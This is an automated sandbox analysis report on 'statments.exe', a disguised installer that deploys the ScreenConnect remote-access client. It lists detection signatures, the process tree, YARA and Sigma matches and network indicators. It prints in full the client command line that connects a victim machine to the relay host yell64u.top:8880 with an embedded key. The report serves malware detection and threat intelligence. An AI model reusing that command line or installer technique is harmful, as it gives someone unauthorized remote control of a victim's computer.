Windows Analysis Report
statments.exe

Overview

General Information

Sample name:statments.exe
Analysis ID:1536325
MD5:95c83010549bc9fe36a625307cf6cd8d
SHA1:67cf78f35d20ba6a07ce771f6092f1efd314e122
SHA256:85276b1893f8307a681f8c8b22c6d7eaa40620afcf987a7a22a4ab39f7300253
Tags:exe, user-malwarology
Infos:

Detection

ScreenConnect Tool
Score:42
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:32
Range:0 - 100

Signatures

.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • statments.exe (PID: 2564 cmdline: "C:\Users\user\Desktop\statments.exe" MD5: 95C83010549BC9FE36A625307CF6CD8D)
    • msiexec.exe (PID: 5308 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 1996 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 3340 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding AB83296B808D1A3E5D9792E4DDFA12DB C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 2288 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI2F66.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5058640 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 5572 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 28425576B87BE497C2D29F2837F582DA MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 3364 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E415C9D2D8304B77F88CF36FA73BEA3D E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 6468 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=76587114-28fc-47f0-86d5-118567cf4a63&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Java&c=&c=IT&c=&c=&c=&c=&c=" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 6792 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "f60a8250-1d8c-4e56-b41b-ff082dd1b17d" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
    • ScreenConnect.WindowsClient.exe (PID: 3836 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "f69440ce-931d-49a5-a5c7-2a17bc772f20" "System" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
statments.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
C:\Config.Msi\4d36d9.rbs | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Windows\Installer\MSI3C18.tmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
0000000A.00000000.1625996294.0000000000702000.00000002.00000001.01000000.00000011.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000001.00000002.1565481069.0000000005740000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0000000A.00000002.2791566703.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000001.00000000.1521771269.0000000000426000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0000000B.00000002.1677731349.0000000002791000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
1.2.statments.exe.5740000.10.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
10.0.ScreenConnect.WindowsClient.exe.700000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
10.2.ScreenConnect.WindowsClient.exe.2b6fa20.0.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
1.0.statments.exe.4d5db8.2.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
1.2.statments.exe.5740000.10.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

                              System Summary

                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=76587114-28fc-47f0-86d5-118567cf4a63&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Java&c=&c=IT&c=&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=76587114-28fc-47f0-86d5-118567cf4a63&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Java&c=&c=IT&c=&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" 
"?e=Access&y=Guest&h=yell64u.top&p=8880&s=76587114-28fc-47f0-86d5-118567cf4a63&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Java&c=&c=IT&c=&c=&c=&c=&c=", ProcessId: 6468, ProcessName: ScreenConnect.ClientService.exe
                              Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (de5851ad6e374ce3) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 1996, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-406F-012C01771397}\(Default)
                              No Suricata rule has matched

                              AV Detection

                              Source: Submitted Sample; Integrated Neural Analysis Model: Matched 95.8% probability
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Code function: 8_2_03A416F8 CryptProtectData,8_2_03A416F8
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Code function: 8_2_03A416F1 CryptProtectData,8_2_03A416F1
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Code function: 8_2_051A2D70 CryptUnprotectData,8_2_051A2D70
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Code function: 8_2_051A2D68 CryptUnprotectData,8_2_051A2D68
                              Source: C:\Users\user\Desktop\statments.exe; EXE: msiexec.exe

                              Compliance

                              Source: C:\Users\user\Desktop\statments.exe; EXE: msiexec.exe
                              Source: statments.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: statments.exe; Static PE information: certificate valid
                              Source: statments.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1676790291.0000000000CA2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1625996294.0000000000702000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: statments.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: statments.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: statments.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2808712261.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1685618274.00000000127A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: statments.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2791566703.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1677731349.0000000002791000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1677160184.0000000000F80000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1677294239.0000000000FC2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: statments.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1608297355.00000000005AD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: statments.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1575096863.0000000004250000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572578801.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1572578801.0000000004352000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: statments.exe, MSI3C18.tmp.3.dr, 4d36d8.msi.3.dr, setup.msi.1.dr, MSI3C77.tmp.3.dr, MSI3F66.tmp.3.dr, 4d36d9.rbs.3.dr, 4d36da.msi.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2808712261.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1685618274.00000000127A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1625996294.0000000000702000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: statments.exe, 4d36d8.msi.3.dr, setup.msi.1.dr, MSI2F66.tmp.2.dr, 4d36da.msi.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: statments.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1676790291.0000000000CA2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2808712261.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1685618274.00000000127A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: statments.exe
                              Source: C:\Windows\System32\msiexec.exe; File opened: z:
                              Source: C:\Windows\System32\msiexec.exe; File opened: x:
                              Source: C:\Windows\System32\msiexec.exe; File opened: v:
                              Source: C:\Windows\System32\msiexec.exe; File opened: t:
                              Source: C:\Windows\System32\msiexec.exe; File opened: r:
                              Source: C:\Windows\System32\msiexec.exe; File opened: p:
                              Source: C:\Windows\System32\msiexec.exe; File opened: n:
                              Source: C:\Windows\System32\msiexec.exe; File opened: l:
                              Source: C:\Windows\System32\msiexec.exe; File opened: j:
                              Source: C:\Windows\System32\msiexec.exe; File opened: h:
                              Source: C:\Windows\System32\msiexec.exe; File opened: f:
                              Source: C:\Windows\System32\msiexec.exe; File opened: b:
                              Source: C:\Windows\System32\msiexec.exe; File opened: y:
                              Source: C:\Windows\System32\msiexec.exe; File opened: w:
                              Source: C:\Windows\System32\msiexec.exe; File opened: u:
                              Source: C:\Windows\System32\msiexec.exe; File opened: s:
                              Source: C:\Windows\System32\msiexec.exe; File opened: q:
                              Source: C:\Windows\System32\msiexec.exe; File opened: o:
                              Source: C:\Windows\System32\msiexec.exe; File opened: m:
                              Source: C:\Windows\System32\msiexec.exe; File opened: k:
                              Source: C:\Windows\System32\msiexec.exe; File opened: i:
                              Source: C:\Windows\System32\msiexec.exe; File opened: g:
                              Source: C:\Windows\System32\msiexec.exe; File opened: e:
                              Source: C:\Windows\System32\msiexec.exe; File opened: c:
                              Source: C:\Windows\System32\msiexec.exe; File opened: a:

                              Networking

                              Source: C:\Windows\System32\msiexec.exe; Registry value created: NULL Service
                              Source: global traffic; TCP traffic: 192.168.2.8:49706 -> 85.239.34.190:8880
                              Source: Joe Sandbox View; ASN Name: RAINBOW-HKRainbownetworklimitedHK RAINBOW-HKRainbownetworklimitedHK
                              Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global traffic; DNS traffic detected: DNS query: yell64u.top
                              Source: statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                              Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1685618274.00000000127A0000.00000004.00000800.00020000.00000000.sdmp, statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                              Source: statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                              Source: statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                              Source: statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                              Source: statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                              Source: ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                              Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1685618274.00000000127A0000.00000004.00000800.00020000.00000000.sdmp, statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                              Source: statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://ocsp.digicert.com0
                              Source: statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://ocsp.digicert.com0A
                              Source: statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://ocsp.digicert.com0C
                              Source: statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://ocsp.digicert.com0X
                              Source: ScreenConnect.ClientService.exe, 00000008.00000002.2793225366.00000000015DA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1677731349.0000000002791000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: rundll32.exe, 00000005.00000003.1572578801.0000000004352000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572760296.0000000004253000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572578801.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr; String found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                              Source: rundll32.exe, 00000005.00000003.1572578801.0000000004352000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572760296.0000000004253000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572578801.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr; String found in binary or memory: http://wixtoolset.org/news/
                              Source: rundll32.exe, 00000005.00000003.1572578801.0000000004352000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572760296.0000000004253000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572578801.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr; String found in binary or memory: http://wixtoolset.org/releases/
                              Source: statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://www.digicert.com/CPS0
                              Source: ScreenConnect.WindowsCredentialProvider.dll.3.dr; String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                              Source: ScreenConnect.Core.dll.3.dr; String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

                              Spam, unwanted Advertisements and Ransom Demands

